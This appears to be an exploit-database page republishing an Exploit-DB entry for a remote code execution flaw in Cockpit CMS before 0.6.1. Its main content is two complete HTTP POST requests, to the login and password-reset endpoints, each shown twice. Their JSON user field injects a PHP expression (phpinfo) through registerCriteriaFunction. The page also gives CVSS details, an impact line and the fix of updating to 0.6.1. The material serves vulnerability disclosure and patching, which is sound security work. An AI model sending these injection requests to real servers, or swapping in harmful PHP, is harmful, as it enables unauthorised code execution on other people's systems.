header-logo
Suggest Exploit
vendor:
Cockpit CMS
by:
Rafael Resende
7.5
CVSS
HIGH
PHP Code Execution
78
CWE
Product Name: Cockpit CMS
Affected Version From: Cockpit CMS < 0.6.1
Affected Version To: Cockpit CMS < 0.6.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Cockpit CMS 0.6.1 – Remote Code Execution

Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. Exploit Login: POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} Exploit Password reset: POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"}

Mitigation:

Update to versions >= 0.6.1
Source

Exploit-DB raw data:

# Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

# Exploit Login
  POST /auth/check HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 52
  Origin: https://example.com

  {"auth":{"user":"test'.phpinfo().'","password":"b"}}

# Exploit Password reset
  POST /auth/requestreset HTTP/1.1
  Host: example.com
  User-Agent: Mozilla/5.0
  Content-Type: application/json; charset=UTF-8
  Content-Length: 28
  Origin: https://example.com

  {"user":"test'.phpinfo().'"}

## Impact
Allows attackers to execute malicious codes to get access to the server.

## Fix
Update to versions >= 0.6.1

Navigation

Suggest Exploit

Services By CQR